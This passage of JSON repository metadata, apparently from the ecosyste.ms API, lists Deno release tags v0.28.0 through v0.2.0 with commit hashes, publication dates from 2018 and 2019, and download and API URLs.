job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositori